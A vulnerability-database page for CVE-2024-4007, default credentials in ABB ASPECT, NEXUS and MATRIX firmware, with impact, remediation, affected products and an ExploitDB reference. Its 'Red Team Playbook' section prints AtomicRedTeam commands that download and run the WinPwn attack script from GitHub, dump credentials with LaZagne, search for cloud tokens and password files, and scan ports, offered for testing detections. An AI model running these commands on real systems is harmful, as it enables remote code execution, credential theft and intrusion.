CVE-2024-4007
Overview
This vulnerability is an authentication bypass caused by the presence of default credentials embedded within the install packages of ABB ASPECT Enterprise and related firmware versions. The root cause lies in improperly configured product instances that retain these default login credentials, allowing unauthorized access. Affected components include ABB ASPECT Enterprise firmware versions and ABB MATRIX Series version 3.07 installations.
Vulnerability Description
Default credential in install package in ABB ASPECT; NEXUS Series; MATRIX Series version 3.07 allows attacker to login to product instances wrongly configured.
Impact
An attacker with network access can gain unauthorized administrative access to affected ABB ASPECT and MATRIX devices by leveraging default credentials, without requiring prior authentication or user interaction. This access enables full control over the system, including confidentiality, integrity, and availability impacts (C:H/I:H/A:H). The vulnerability facilitates unauthorized data access, system manipulation, and potential disruption of industrial control processes, significantly compromising operational security.
Solution
ABB has published an advisory detailing this issue and recommends updating affected products to firmware versions that remove or disable default credentials. Users should consult the ABB technical document 9AKK108469A6101 available at https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A6101&LanguageCode=en&DocumentPartId=&Action=Launch for specific remediation steps. The advisory instructs operators to verify configuration settings to ensure default credentials are changed or disabled during installation and apply firmware updates for ABB ASPECT Enterprise and MATRIX Series devices accordingly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with default credentials in the installation package of certain ABB products, including the ASPECT, NEXUS, and MATRIX series, presents a significant security risk. Default credentials are often hard-coded usernames and passwords that are set by manufacturers to facilitate initial setup and configuration. When these credentials are not changed post-installation, they can be exploited by malicious actors to gain unauthorized access to the affected systems. This vulnerability is particularly concerning given the critical nature of the environments these products are often deployed in, such as industrial control systems and automation frameworks.
Attack vectors for this vulnerability are straightforward. An attacker with knowledge of the default credentials can easily access the product instances that are improperly configured. This could be achieved through direct network access, where the attacker scans for devices using the default credentials, or through social engineering tactics that trick users into revealing their login information. Once access is gained, the attacker can manipulate system settings, exfiltrate sensitive data, or even disrupt operations, leading to severe consequences for the organization.
The real-world impact of this vulnerability is profound, especially for organizations relying on ABB's automation and control solutions. Unauthorized access could lead to operational downtime, loss of sensitive data, and potential safety hazards in environments where these systems control critical infrastructure. The financial implications can be staggering, with costs arising from incident response, regulatory fines, and reputational damage. Furthermore, the high CVSS score of 8.8 indicates that this vulnerability poses a serious threat, warranting immediate attention from affected organizations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular audits of system configurations should be conducted to identify devices using default credentials. Automated tools can assist in scanning networks for these vulnerabilities, ensuring that any instances of default credentials are flagged for remediation. Additionally, organizations should enforce strict policies that require changing default credentials during the initial setup process. Training employees on the importance of cybersecurity hygiene, including the management of credentials, can further reduce the risk of exploitation.
In conclusion, the presence of default credentials in ABB's ASPECT, NEXUS, and MATRIX series products represents a critical vulnerability that can be easily exploited if not addressed. Organizations must prioritize the detection and remediation of this issue to safeguard their systems against unauthorized access and potential operational disruptions. By adopting proactive security measures and fostering a culture of cybersecurity awareness, businesses can significantly mitigate the risks associated with this vulnerability and protect their critical assets.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Aspect-Ent-12 Firmware | All |
cpe:2.3:o:abb:aspect-ent-12_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-2 Firmware | All |
cpe:2.3:o:abb:aspect-ent-2_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-256 Firmware | All |
cpe:2.3:o:abb:aspect-ent-256_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-96 Firmware | All |
cpe:2.3:o:abb:aspect-ent-96_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-11 Firmware | All |
cpe:2.3:o:abb:matrix-11_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-216 Firmware | All |
cpe:2.3:o:abb:matrix-216_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-232 Firmware | All |
cpe:2.3:o:abb:matrix-232_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-264 Firmware | All |
cpe:2.3:o:abb:matrix-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-296 Firmware | All |
cpe:2.3:o:abb:matrix-296_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128 Firmware | All |
cpe:2.3:o:abb:nexus-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264 Firmware | All |
cpe:2.3:o:abb:nexus-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-2128 Firmware | All |
cpe:2.3:o:abb:nexus-3-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-264 Firmware | All |
cpe:2.3:o:abb:nexus-3-264_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials | LiquidWorm | webapps | php | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-4007 |
| search.abb.com |
GitHub CVE
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A6101&LanguageCode=en&DocumentPartId=&Action=Launch |